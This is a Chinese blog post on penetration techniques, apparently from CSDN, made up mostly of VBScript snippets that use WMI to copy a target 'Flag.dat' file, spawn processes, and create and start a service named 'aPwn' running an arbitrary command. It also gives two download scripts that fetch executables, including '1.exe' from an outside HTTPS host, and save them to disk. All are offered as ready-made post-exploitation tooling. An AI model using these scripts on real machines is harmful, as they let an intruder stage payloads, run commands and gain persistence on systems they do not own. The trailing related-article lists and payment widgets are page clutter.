高级渗透之VBS调用WMI接口

最新推荐文章于 2024-04-29 10:30:00 发布
最新推荐文章于 2024-04-29 10:30:00 发布
阅读量2.5k 收藏 6
点赞数 2
分类专栏: 渗透技巧 文章标签: 渗透技巧 WMI VBS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cssxn/article/details/89323519
版权

vbs调用WMI接口复制文件:

Set objWMIService = GetObject("winmgmts://./root/CIMV2")
Set colFiles = objWMIService.ExecQuery("SELECT * FROM CIM_DataFIle Where Name='c:\\target\\Flag.dat'")
For Each objFile In ColFiles
	objFile.Copy("C:\pwn\Flag.dat")
Next

创建进程:

Dim objWMIService, objProcess, strShell, objProgram
set objWMIService = getobject("winmgmts://./root/cimv2")
Set objProcess = objWMIService.Get("Win32_Process")
Set objProgram = objProcess.Methods_("Create").InParameters.SpawnInstance_
objProgram.CommandLine = "Calc.exe"
objWMIService.ExecMethod  "Win32_Process", "Create", objProgram

创建服务:

	Const OWN_PROCESS = 16
	Const NOT_INTERACTIVE = False
	Const NORMAL_ERROR_CONTROL = 2
	Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
	Set objService = objWMIService.Get("Win32_BaseService")
	errReturn = objService.Create("aPwn" ,"aPWN service" ,"这里修改成要执行的命令", OWN_PROCESS, NORMAL_ERROR_CONTROL, "Manual", NOT_INTERACTIVE, "NT AUTHORITY\LocalService", ""  )
	If errReturn = 23 Then
		Set ServiceSet = GetObject("winmgmts:").ExecQuery("select * from Win32_Service where Name='aPwn'")
		for each Service in ServiceSet
			Service.StartService()
		next
	End If

vbs下载文件脚本

Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.XMLHTTP")
http.open "GET","http://192.168.81.192/putty.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\download\a.exe"
ado.Close

下面这个支持https下载:

Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
http.SetOption 2, 13056
http.open "GET","https://xxx.com/1.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\download\a.exe"
ado.Close
FFE4
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
VBSWMI的基础知识
12-24
从百度文库下到的资料,觉得对一些初学者会有帮助。 声明,非原创,意在分享。
vbs遍历and关闭进程脚本 objWMIServices.Execquery
06-20
vbs遍历and关闭进程脚本 objWMIServices.Execquery
vbs调用windows wmiWMIvbs
dickzhu的专栏
05-12 290
https://msdn.microsoft.com/en-us/library/aa393262(v=vs.85).aspx https://msdn.microsoft.com/en-us/library/aa393258(v=vs.85).aspx https://msdn.microsoft.com/en-us/library/aa384642(VS.85).aspx
Windows安全基础——Windows WMI详解
最新发布
wangluoanquan111的博客
04-29 1395
WMI(Windows Management Instrumentation, Windows管理规范)是Windows2000/XP管理系统的核心,属于管理数据和操作的基础模块。设计WMI的初衷是达到一种通用性,通过WMI操作系统、应用程序等来管理本地或者远程资源。它支持分布式组件对象模型(DCOM,DistributionModel)和Windows远程管理(WinRM),用户可通过WMI服务访问、配置、管理和监视Windows所有资源的功能。
VBS的开发利器---WMI信息绑定参考地址
weixin_33701564的博客
01-08 91
帮助文档参考地址如下: http://msdn.microsoft.com/zh-cn/library/ms974579.aspx (微软官方中文的参考喔) http://msdn.microsoft.com/en-us/library/aa394572(v=vs.85).aspx(英文的说明,比较对WMI文档)...
WMI的基础介绍在vbs中的使用方式
weixin_33913377的博客
01-08 502
WMI轻松入门之一 一、基本概念 其实我给文章起这样的名字,绝对没有轻视WMI的意思,事实上就连微软也有“WMI非常难于学习而且更难于使用”的说法,在近日的学习过程中更感觉到了WMI检索功能的强大,之所以起个“轻松入门”的名字,我只是有感于外国人写教程在思路上和国人不太一致,西方式的幽默看起来困难无比,再加上一上手就在类的基本结构上展开讨论,吓跑了无数Vbs的爱好者,想从国人常见的角度出发来说说...
VBS调用WMI快速关闭IE的脚本
09-06
在上述的脚本中,VBS被用来通过Windows Management Instrumentation(WMI接口来快速关闭所有运行中的IE浏览器实例。WMI是Windows操作系统提供的一种标准管理基础设施,允许开发者访问和操作系统的各种管理信息。 ...
VBS调用WMI实现搜索硬盘mp3文件
09-05
如果你想用递归搜索我也没办法。下面的程序搜索电脑上所有的MP3文件。
VBS调用WMI遍历搜索硬盘文件并计数的方法
09-01
主要介绍了VBS调用WMI遍历搜索硬盘文件并计数的方法,需要的朋友可以参考下
VBS通过WMI监视注册表变动的代码
01-19
Google一下“VBS监视注册表”,TOP 5都是一模一样的代码,我查了一下,出处是Hey, Scripting Guy! Blog上一篇名为《How Can I Monitor Changes to a Registry Key?》的文章,真是厚颜无耻。 文章我没时间翻译了,贴...
vbs wmi获取电脑硬件信息实例
09-06
通过使用VBScript (Visual Basic Scripting Edition) 和WMI (Windows ...通过VBSWMI的结合,开发者可以轻松地获取和展示系统级别的详细信息,这对于诊断问题、优化系统配置或者进行硬件升级规划都非常有帮助。
VBS调用Web接口
04-30
Dim objHTTP,xmlDOC,strWebserviceURL,strRequest,bOK,xmlStr Set objHTTP = CreateObject("MSXML2.XMLHTTP"
WMI方式获取硬盘序列号VBS脚本
06-30
通过调用WMI对象,查询并获取硬盘的序列号,签名及标签
使用wmivbs实现SingleInstance
smartcatiboy的专栏
08-24 588
vbs脚本中,有时需要只运行一个实例。借助Wmi的强大功能,我们可以曲线实现这一功能。代码如下option explicit主过程,在开始前监测是否脚本只有一个实例  main:Sub main()    If Not amISingle Then Exit Sub   或者wscript.quit      do whats your w
VBS学习日记(十) WMI 基础
仒雨的专栏
07-21 1214
Vbs 脚本编程简明教程—WMI 基础之一 WMI 即 Windows 管理规范,是用户管理本地和远程计算机的一种模型。通过它可以访问、配置、管理和监视几乎所有的 Windows 资源。WMI 的语法十分简单,基本上常见的命名空间、对象等用几乎一模一样。它对应的是 Windows 里的 WMI 服务(winmgmt)。更多详细信息,参见百度百科 一、WMI 的命名空间 那么命名空
VBS进价编程必须学会的WMI介绍
weixin_34061042的博客
06-15 139
WMI 体系结构中我们最需要关心的就是WMI提供程序,WMI提供程序在WMI和托管资源之间扮演着中间方的角色。提供程序代表使用者应用程序和脚本从WMI托管资源请求信息,并发送指令到WMI托管资源。下面是我们利用WMI编程经常要用到的WMI内置提供程序清单,以供编程参考。 1.Active Directory提供程序 链接库文件:dsprov.dll...
"全面介绍WMI接口与各硬件设备的资料
WMI接口文档提供了相当全面的资料,其中包括了各种系统硬件和设备的信息,如Win32_Processor(CPU处理器)、Win32_PhysicalMemory(物理内存)、Win32_Keyboard(键盘)、Win32_PointingDevice(点输入设备,如鼠标...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值